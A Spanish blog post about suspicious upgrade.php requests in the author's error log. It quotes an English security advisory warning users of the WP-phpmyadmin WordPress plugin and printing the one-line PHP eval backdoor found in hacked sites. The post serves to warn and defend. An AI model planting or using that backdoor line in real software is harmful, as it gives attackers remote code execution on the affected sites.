script ‘C:/AppServ/www/phpMyAdmin/upgrade.php’ encontrado en error.log

No paro de encontrar cosas curiosas examinando mi error.log del blog, la penultima es esta linea:

script ‘C:/AppServ/www/phpMyAdmin/upgrade.php’

Ejecutada por tres diferentes ip’s en menos de 2 minutos, quiza sea un intento fallido de denegacion de servicio, me estan hackeando el blog, uuuhhhhh… que miedo. Pues nada mas lejos de la realidad, por supuesto, realizo la pertinente busqueda de la cadena completa en Google y me encuentro con esto: (fuente)

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST[«asc»]))eval(stripslashes($_REQUEST[«asc»])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.

---

If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.

 

Por suerte no estoy usando el plugin para WordPress que «ofrece» este bug, nunca esta de mas saber estas cosas. Ya sabeis, si estais usando el plugin WP-phpmyadmin, desinstalarlo, u os pueden marear un poco el blog.